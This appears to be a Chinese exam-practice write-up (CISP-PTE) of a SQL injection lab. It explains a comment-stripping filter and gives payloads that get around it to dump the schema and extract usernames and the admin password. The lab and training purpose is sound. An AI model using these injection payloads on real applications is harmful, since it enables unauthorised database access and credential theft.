CISP-PTE练习篇(基础题目一:SQL注入)

这篇具有很好参考价值的文章主要介绍了CISP-PTE练习篇(基础题目一:SQL注入)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

本文仅当作练习记录使用。

开始答题:

CISP-PTE练习篇(基础题目一:SQL注入),web安全

注册账号 poi ,在发表出给出过滤代码如下;

// 代码过滤规则
while (strstr($sql,'--')) {
	$sql = str_replace("--", "", $sql);
}
while (strstr($sql,'#')) {
	$sql = str_replace("#", "", $sql);
}

函数的作用:

strstr(str1,str2)
函数用于判断字符串str2是否是str1的子串。如果是,则该函数返回 str1字符串从 str2第一次出现的位置开始到 str1结尾的字符串;否则,返回NULL。

举例:

<?php
echo strstr("123456","5");

?>
意思就是只返回 "123456" 中出现的第一个 "5" 直到结束(显示结果结果为 56)

str_replace("--", "", $sql);
意思是将--$sql中的全部替换为 空
str_replace()函数
str_replace(find,replace,string);

find       必需。规定要查找的值。
replace 必需。规定替换 find 中的值的值。
string    必需。规定被搜索的字符串。
<?php
echo str_replace("1","2","11111");
?>
意思就是将111111中的1全部替换为2(显示结果为22222)

知道函数的作用之后尝试进行绕过,可利用在线运行PHP攻击进行尝试绕过。

系统没有过滤空格等特殊符号

CISP-PTE练习篇(基础题目一:SQL注入),web安全

获取当前数据库:

database',(select database()),'poi') #-#---

CISP-PTE练习篇(基础题目一:SQL注入),web安全

 获取2web数据库中的所有表:

22',(select group_concat(table_name) from information_schema.tables where table_schema='2web'),'poi')#-#---

CISP-PTE练习篇(基础题目一:SQL注入),web安全

 获取表中的字段:

column_name',(select group_concat(column_name) from information_schema.columns where  table_name='users1'),'poi')#-#---

CISP-PTE练习篇(基础题目一:SQL注入),web安全

 获取字段 password,username 中的值:

22',(select group_concat(username,'_',password) from users1),'poi')#-#---

想直接获取所有的 password,username 的值但是没有成功---可能由于查询长度过长做了限制。

知道了表明为users1,字段名为password,username;直接select * from 进行查询。

22',(select password from users1 where username='admin'),'poi')#-#---

CISP-PTE练习篇(基础题目一:SQL注入),web安全

知识点补充:

information_schema 库存储了其他数据库中的所有信息
tables表          保存了所有的数据库的名称和数据库表的名称等
schemata表    保存了所有的数据库的名称和数据库的编码信息等
columns表      保存了mysql数据库中所有表的信息如:数据库名称、字段名称、字段类型等
schema_name    库名信息
table_name         表名信息
column_name     字段信息

group_concat()    拼接显示 文章来源地址https://www.toymoban.com/news/detail-666568.html

到了这里,关于CISP-PTE练习篇(基础题目一:SQL注入)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【WEB安全】SQL注入挖掘

    2021年OWASP发布漏洞威胁榜单,SQL注入从第一名下降到第三(https://owasp.org/Top10/),SQL注入是一种常见的Web攻击技术,通过构造恶意的SQL语句来破坏数据库安全。攻击者可以通过提交带有恶意代码的输入,例如网页表单,来控制数据库执行恶意语句。这样,攻击者可以访问敏感

    2024年02月13日
    浏览(41)
  • Web安全-初识SQL注入(一)

    将不受信任的数据作为命令或查询的一部分发送到解析器时,会产生诸如SQL注入、NoSQL注入、OS 注入和LDAP注入的注入缺陷。攻击者的恶意数据可以诱使解析器在没有适当授权的情况下执行非预期命令或访问数据。 注入能导致数据丢失、 破坏或泄露给无授权方,缺乏可审计性

    2024年02月05日
    浏览(47)
  • Web安全:SQL注入漏洞测试.

    SQL注入就是 有些 恶意用户在提交查询请求的过程中 将SQL语句插入到请求内容 中,同时程序的本身对用户输入的内容过于相信, 没有对用户插入的SQL语句进行任何的过滤 ,从而 直接被SQL语句直接被服务端执行 ,导致数据库的原有信息泄露,篡改,甚至被删除等风险。 SQL注

    2024年02月05日
    浏览(56)
  • Web安全-SQL注入常用函数(二)

    ★★实战前置声明★★ 文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与学习之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。 初始化安装MySQL数据库后(基于MySQL版本5.7.x),默认会创建4个系统数据库: 以下内

    2024年01月19日
    浏览(53)
  • Web安全之SQL注入绕过技巧

    两个空格代替一个空格,用Tab代替空格,%a0=空格:   最基本的绕过方法,用注释替换空格: 使用浮点数: 如果空格被过滤,括号没有被过滤,可以用括号绕过。 在MySQL中,括号是用来包围子查询的。因此,任何可以计算出结果的语句,都可以用括号包围起来。而括号的两

    2024年02月07日
    浏览(44)
  • web安全漏洞-SQL注入攻击实验

    实验目的 学习sql显注的漏洞判断原理 掌握sqlmap工具的使用 分析SQL注入漏洞的成因 实验工具 sqlmap是用python写的开源的测试框架,支持MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,IBM DB2,SQLite,Firebird,Sybase,SAP,MAXDB并支持6种SQL注入手段。 实验内容 SQL注入(SQL I

    2024年02月06日
    浏览(56)
  • 加强Web应用程序安全:防止SQL注入

    数据库在Web应用程序中存储和组织数据时起着至关重要的作用,它是存储用户信息、内容和其他应用程序数据的中央存储库。而数据库实现了高效的数据检索、操作和管理,使Web应用程序能够向用户提供动态和个性化的内容。然而,数据库和网络应用程序之间的通信不畅可能

    2024年02月14日
    浏览(44)
  • Web安全:SQL注入漏洞测试(防止 黑客利用此漏洞.)

    SQL注入就是 有些 恶意用户在提交查询请求的过程中 将SQL语句插入到请求内容 中,同时程序的本身对用户输入的内容过于相信, 没有对用户插入的SQL语句进行任何的过滤 ,从而 直接被SQL语句直接被服务端执行 ,导致数据库的原有信息泄露,篡改,甚至被删除等风险。 SQL注

    2024年02月13日
    浏览(40)
  • Web安全 SQL注入漏洞测试.(可以 防止恶意用户利用漏洞)

    SQL注入就是 有些 恶意用户在提交查询请求的过程中 将SQL语句插入到请求内容 中,同时程序的本身对用户输入的内容过于相信, 没有对用户插入的SQL语句进行任何的过滤 ,从而 直接被SQL语句直接被服务端执行 ,导致数据库的原有信息泄露,篡改,甚至被删除等风险。 SQL注

    2023年04月20日
    浏览(51)
  • 常见web安全漏洞-暴力破解,xss,SQL注入,csrf

    1,暴力破解 原理:         使用大量的认证信息在认证接口进行登录认证,知道正确为止。为提高效率一般使用带有字典的工具自动化操作         基于表单的暴力破解 --- 若用户没有安全认证,直接进行抓包破解。 验证码绕过                           on s

    2023年04月12日
    浏览(53)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包